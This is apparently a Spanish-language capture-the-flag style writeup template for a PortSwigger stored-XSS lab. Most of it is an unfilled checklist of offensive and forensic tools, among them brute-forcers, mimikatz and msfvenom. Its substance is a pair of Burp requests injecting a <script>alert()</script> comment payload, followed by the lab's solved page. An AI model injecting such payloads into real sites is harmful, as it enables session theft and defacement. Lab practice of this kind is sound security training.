☠️WRITEUP EXTENSO

AUDITORIA DE: ((Laboratorio: XSS almacenado en contexto HTML sin nada codificado))

RECONOCIMIENTO PASIVO

BROWSER --------------------------------->https://www.paimon.com.ar/

<div class="blog-post">
                        <a href="/post?postId=1"><img src="/image/blog/posts/63.jpg"></a>
                        <h2>Shopping Woes</h2>
                        <p>I'm one of those really annoying people you don't want to get stuck behind in the grocery store. I love to chat, and boy can I chat, to the cashier. My money is always at the bottom of my rucksack,...</p>
                        <a class="button is-small" href="/post?postId=1">View post</a>
                        </div>

CONCLUSION: VEMOS QUE MANEJA CON EL PARAMENTRO POSTID CON NUMEROS CORRELATIVOS CADA POST

BROWSER --------------------------------->https://www.paimon.com.ar/

<form action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
                            <input required="" type="hidden" name="csrf" value="5aGK2T2ryPOp8qacwVPwWi9aaiShRntn">
                            <input required="" type="hidden" name="postId" value="1">
                            <label>Comment:</label>
                            <textarea required="" rows="12" cols="300" name="comment"></textarea>
                                    <label>Name:</label>
                                    <input required="" type="text" name="name">
                                    <label>Email:</label>
                                    <input required="" type="email" name="email">
                                    <label>Website:</label>
                                    <input pattern="(http:|https:).+" type="text" name="website">
                            <button class="button" type="submit">Post Comment</button>
                        </form>

CONCLUSION: VEMOS EL FORMULARIO DE QUE POR METODO POST ENVIA LOS COMENTARIOS DE LOS USARIOS EN EL SITIO, VEMOS COMO CON ACTION /post/comment HACE UN LALMADO A LA FUNCION QUE RECIBE LOS DATOS EN EL SERVIDOR

NMAP --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAYBACKMACHINE --------------------------------->https://archive.org/web/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MALTEGO --------------------------------->https://www.maltego.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CENSYS --------------------------------->https://search.censys.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEB-CHECK --------------------------------->https://web-check.xyz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THEHARVESTER --------------------------------->https://github.com/laramies/theHarvester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPPALYZER --------------------------------->https://www.wappalyzer.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DNSdumpster --------------------------------->https://dnsdumpster.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROBTEX --------------------------------->https://www.robtex.com/#google_vignette
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WHOIS --------------------------------->https://who.is/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NSLOOKUP --------------------------------->https://www.nslookup.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GHUNT --------------------------------->https://github.com/mxrch/GHunt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LLANTUN --------------------------------->https://github.com/lesandcl/Llaitun
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DISCOVER --------------------------------->https://github.com/leebaird/discover
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHERLOCK --------------------------------->https://github.com/sherlock-project/sherlock
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WHATWEB --------------------------------->https://www.kali.org/tools/whatweb/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIAGRAMAS --------------------------------->https://app.diagrams.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4INformesmentales --------------------------------->https://app.gitbook.com/o/7R5fPL7tMt73q9k0N7ZG/s/2rX5FvtpEjxBEKVG60XW/curso-hacking-con-python/tool-para-informes-de-mapas-mentales-p4informesmentales.py
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

ANALISIS FORENSE

AUTOPSY https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DFF (Digital Forensics Framework) https://github.com/arxsys/dff
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSK (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
X-WAYS Forensics https://www.x-ways.net/forensics/index-m.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FOREMOST https://github.com/korczis/foremost
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

RECONOCIMIENTO ACTIVO

PING --------------------------------->https://www.kali.org/tools/fping/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NESSUS --------------------------------->https://es-la.tenable.com/products/nessus/nessus-essentials
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPENVAS --------------------------------->https://github.com/greenbone/openvas-scanner
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NIKTO --------------------------------->https://github.com/sullo/nikto
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

BURP SUITE --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

REQUEST:

POST /post/comment HTTP/1.1
Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
Content-Length: 171
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Li
nux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Origin: https://0a9f006203c52313803221f800f20052.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post?postId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

csrf=5aGK2T2ryPOp8qacwVPwWi9aaiShRntn&postId=1&comment=hola+tu+hermana+rica&name=PAIMON&email=P4IM0N%40hotmail.com&website=https%3A%2F%2Fp4imon-d-m-python.herokuapp.com%2F


-----


GET /post/comment/confirmation?postId=1 HTTP/2
Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post?postId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8

CONCLUSION: CORROBORAMOS UNA PRIMER VISTA DE COMO SE MANEJAN LAS REQUEST AL ENVIAR COMENTARIOS

OWASP ZAP --------------------------------->https://github.com/zaproxy/zaproxy
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WPSCAN --------------------------------->https://wpscan.com/register/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOOMSCAN --------------------------------->https://www.kali.org/tools/joomscan/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TRACEROUTE --------------------------------->https://www.kali.org/tools/traceroute/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SKIP-FISH --------------------------------->https://www.kali.org/tools/skipfish/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPITI --------------------------------->https://www.kali.org/tools/wapiti/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ETTERCAP --------------------------------->https://www.kali.org/tools/ettercap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIFITE --------------------------------->https://www.kali.org/tools/wifite/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SPOOFTOOPH --------------------------------->https://www.kali.org/tools/spooftooph/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

INVESTIGACION OSINT

OSINT Framework --------------------------------->https://osintframework.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSRFrameworK --------------------------------->https://www.kali.org/tools/osrframework/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SN0INT --------------------------------->https://www.kali.org/tools/sn0int/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSINTGRAM --------------------------------->https://github.com/Datalux/Osintgram
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TWOSINT --------------------------------->https://github.com/falkensmz/tw1tter0s1nt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X FACEBOOK --------------------------------->https://intelx.io/tools?tab=facebook
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X PERSONAS --------------------------------->https://intelx.io/tools?tab=person
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X TELEFONOS --------------------------------->https://intelx.io/tools?tab=telephone
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X Ubicación 2 Mapa --------------------------------->https://intelx.io/tools?tab=location
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X IMAGEN --------------------------------->https://intelx.io/tools?tab=image
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X NOMBRE DE USUARIO --------------------------------->https://intelx.io/tools?tab=username
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X HASH INVERSA --------------------------------->https://intelx.io/tools?tab=hash
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X ARCHIVOS --------------------------------->https://intelx.io/tools?tab=file
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X VIN VEHICULOS --------------------------------->https://intelx.io/tools?tab=vin
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

HASHES Y DESENCRIPTADOS

JOHN THE RIPPER --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HASHCAT --------------------------------->https://www.kali.org/tools/hashcat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAINBOWCRACK --------------------------------->https://www.kali.org/tools/rainbowcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPHCRACK --------------------------------->https://www.kali.org/tools/ophcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKSTATION --------------------------------->https://crackstation.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CAIN Y ABEL --------------------------------->https://github.com/xchwarze/Cain
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DAVEGRO1 --------------------------------->https://github.com/octomagon/davegrohl
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ElcomSoft Distributed Password Recovery --------------------------------->https://www.elcomsoft.es/edpr.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK RAR --------------------------------->https://github.com/TermuxHackz/Crack-rar
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK NINJA RAR --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CEWL WORDLIST --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRUNCH WORDLIST --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4Iwordlists --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

FUERZA BRUTA A LOGINS

HYDRA --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
161 ONESIXTYONE --------------------------------->https://www.kali.org/tools/onesixtyone/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-PPTP-BRUTER --------------------------------->https://www.kali.org/tools/thc-pptp-bruter/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CROWBAR RDP --------------------------------->https://www.kali.org/tools/crowbar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THE CRACKER PDF,ZIP,RAR,LOGIN --------------------------------->https://github.com/XDeadHackerX/The_Cracker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
T14M4T scaneo de servicios en puertos y fuerza bruta automatizado --------------------------------->https://github.com/MS-WEB-BN/t14m4t
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FACEBOOK-BRUTE-FORCE --------------------------------->https://github.com/likhonsible/Facebook-Brute-Force
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

SCRIPT DE EXPLOIT Y PAYLOADS

METASPLOIT --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTOOL --------------------------------->chrome-extension://cmbndhnoonmghfofefkcccljbkdpamhi/index.html
```
<script>alert('XSS')</script>
```
- CONCLUSION:
Burp Suite --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SEARCHSPLOIT --------------------------------->https://www.kali.org/tools/exploitdb/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EXPLOITDB --------------------------------->https://www.exploit-db.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GITHUB SEARCH --------------------------------->https://github.com/search
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AWESOMEHACKING --------------------------------->https://awesomehacking.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NVD VULNERABILITIES BASE --------------------------------->https://nvd.nist.gov/vuln
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MSFVENOM PAYLOAD --------------------------------->https://www.kali.org/tools/metasploit-framework/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MSFPC PAYLOAD --------------------------------->https://www.kali.org/tools/msfpc/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAPID7 vulnerabilidades y exploits --------------------------------->https://www.rapid7.com/db/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

EXPLOTACION

METASPLOIT --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

BURP SUITE --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

REQUEST:


POST /post/comment HTTP/1.1
Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
Content-Length: 171
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Origin: https://0a9f006203c52313803221f800f20052.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post?postId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

csrf=5aGK2T2ryPOp8qacwVPwWi9aaiShRntn&postId=1&comment=<script>alert('XSS_por_P4IM0N')</script>&name=PAIMON&email=P4IM0N%40hotmail.com&website=https%3A%2F%2Fp4imon-d-m-python.herokuapp.com%2F




GET /post/comment/confirmation?postId=1 HTTP/2
Host: 0a9f006203c52313803221f800f20052.web-security-academy.net
Cookie: session=gVRGbyObaBk8uOuMZCOyN6GCDLL89rnM
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Origin: https://0a9f006203c52313803221f800f20052.web-security-academy.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9f006203c52313803221f800f20052.web-security-academy.net/post/comment
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8




RESPONSE:


HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 5880

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Stored XSS into HTML context with nothing encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner is-solved'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Stored XSS into HTML context with nothing encoded
                             class=notification-labsolved-hidden>
                <div class=container>
                    <h4>Congratulations, you solved the lab!</h4>
                    <div>
                        <span>
                            Share your skills!
                        </span>
                        <a class=button href='
                                           <header class="notification-header">
                    </header>
                    <h1>Thank you for your comment!</h1>
                    <p>Your comment has been submitted.</p>
                    <div class="is-linkback">
                        <a href="/post?postId=1">Back to blog</a>
                    </div>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>

CONCLUSION: INTENTAMOS INYECTAR LA CARGA UTIL (<script>alert('XSS_por_P4IM0N')</script>) y LOGRAMOS EL XSS ALMACENADO, SE TENZO RESOLVIMOS EL LABORATORIO.

SQLMAP --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VELO --------------------------------->https://github.com/Veil-Framework/Veil
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEB2ATTACK --------------------------------->https://github.com/santatic/web2attack
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEBSPLOIT --------------------------------->https://github.com/The404Hacking/websploit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BEEF FRAMEWORK EXPLOTACION--------------------------------->https://www.kali.org/tools/beef-xss/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

ESCALADA DE PRIVILEGIOS WINDOWS

METASPLOIT --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERUP --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MIMIKATZ --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROTTENPOTATO --------------------------------->https://github.com/breenmachine/RottenPotatoNG
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWS EXPLOITS SUGGESTER --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ACCESSCHK --------------------------------->https://github.com/ankh2054/windows-pentest
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PSEXEC --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINPEAS --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
